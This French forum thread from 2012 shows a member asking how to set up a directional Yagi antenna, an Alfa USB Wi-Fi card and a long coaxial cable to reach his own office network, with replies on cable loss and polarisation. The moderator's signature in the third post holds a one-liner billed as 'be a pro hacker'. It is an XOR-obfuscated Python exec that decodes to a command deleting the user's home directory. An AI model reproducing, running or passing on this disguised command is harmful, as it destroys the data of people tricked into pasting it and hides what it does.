Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 18-05-2012 19:53:19

donjuandemarco
Membre Radioactif
Lieu : Algéria

SOS astuce pour installer antenne râteau directionnel

Bonjour,

NB : Avant tout, je sollicite les admins de ne pas supprimer mon sujet SVP par ce qu'il est long, je vous confirme que les testes a appliquer sur mon propre réseau "wifi de mon bureau de travail"  à 300 métres de mon domicile au sommet d'un rocher avec une voie directe sans obstacle physique sauf les facteurs extérieur "les intemporées"  pour éviter de faire deux "2" abonnements internet chez notre opérateur et pas un piratage ou cracker des clés wifi.

En premier temps, je vous félicite pour ce fameux forum que je suis devenu fan et de plus accro dés ma première  visite sur ce site, un grand bravo et applaudissement  pour vous chers organisateurs et administrateurs sans oublié les membres de tout les coins qui contribuent à la continuation et amélioration de la sécurité et intrusion informatique.
De ce fait, je m'adresse mon message aux experts dans le domaine réseau, pour mieux comprendre je vais vous citer le matériel que j'ai eu l'acquisition a peu de temps comme suit :

-carte wifi alfa network AWUS036H 1000mw
-antenne râteau "wifi" directionnel gain 13dbi équipée avec un câble coaxial 50ohms plus de 15 mètres a l'extrémité un connecteur type N-mâle "Jack"
-adaptateur Rp-sma mâle "Jack" vers N-femelle
-un câble USB active 2.0 15 mètres
-Backtrack 4r1 pour faire mes testes sur mon propres réseau "version VM Ware"

Finalement, je mets tout comme mentionné en haut entre vos mains pour m'orienter et me guider a travers mon message a avoir des recommandations et conseils en or pour faire une installation parfaite et éviter les pertes de gain en dbi ce qu'il concerne l'antenne râteau wifi.

NB : j'ai lu dans les sujets précédents que de plus le câble coaxial est long, il aura plus de perte .
-Sachant que je voudrais exploiter le Max de câble coaxial pour faire relier l'antenne avec mon pc portable situé dans ma chambre, la distance entre l'antenne "à la terrasse" et la chambre "1er étage" allant jusqu'au 30 mètres quasiment.

-mes demandes sont bien précisées et déterminées ce que je le pense et autres choses SVP :

-l'antenne directionnel, vaut mieux la mettre verticale "perpendiculaire" ou horizontale pour une réception optimale.
-veuillez me déterminer la longueur du câble coaxial autorisé en évitant le Max des pertes.

En dernier, je vous remercie infiniment d'avoir assister et contribuer a résoudre mon petit problème car j'en suis amateur et fasciné de ce domaine et désolé une autre fois d'être long car j'ai pas voulu oublier un facteur ou critère.

Dans l'attente, Veuillez accepter, Messieurs, Dames, Mes sincères salutations distinguées.

Très impatient pour avoir vos suggestions.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 19-05-2012 03:41:35

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Re : SOS astuce pour installer antenne râteau directionnel

Salut et bienvenue wink

Je trouve que le câble coaxial est très long et que, sans faire des calculs, ça peut provoquer des pertes. Il faudrait absolument que la carte Alfa soit le plus proche de l'antenne, sinon tu peux utiliser un booster (amplificateur) entre l'antenne et  la carte Alfa, mais je ne sais pas si c'est vraiment efficace car cela peut engendrer du bruit.

Concernant la polarisation, tu essaies dans un sens ou dans l'autre et regardes si le signal est excellent ou faible. Mais en réalité ça dépend de l'antenne de l’émetteur donc de l'AP (box) lequel tu vises, pour une antenne omnidirectionnelle (comme celle de l'Alfa) si elle est à la verticale sa polarisation est verticale aussi et inversement, et donc tu dois adapter ton antenne de réception de la même manière.

Il aurait été judicieux que tu crées ce topic dans la section Routeurs, antennes et amplificateurs WIFI et par la même occasion jettes un oeil à ce sujet --> Comment bien choisir son antenne Wi-Fi.

#3 19-05-2012 09:12:31

spawn
Modérateur

Bonjour !

NB :  Ne t'inquiètes pas, ici on ne supprime même pas les posts de spam (enfin si un peu quand même) et ton post est précis, et nous on aime ça les posts précis. (:
N'hésite pas à te présenter dans la rubrique adaptée !

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 19-05-2012 10:31:14

donjuandemarco
Membre Radioactif
Lieu : Algéria

Bonjour,

Suite à vos réponses,je vous remercie d'être rapide et répondre a ma question et pour l'acceuil ça me fait plaisir d'être membre parmi vous, et je dois jeter un coup d'oeil dans comment choisir une antenne ça me semblait trés utile et un sujet précieux, en grand j'ai eu quelque informations mais ça me manque un peu de précision j'éspere avoir d'autre collaboration et assistance technique

Merci pour votre attention

Annonce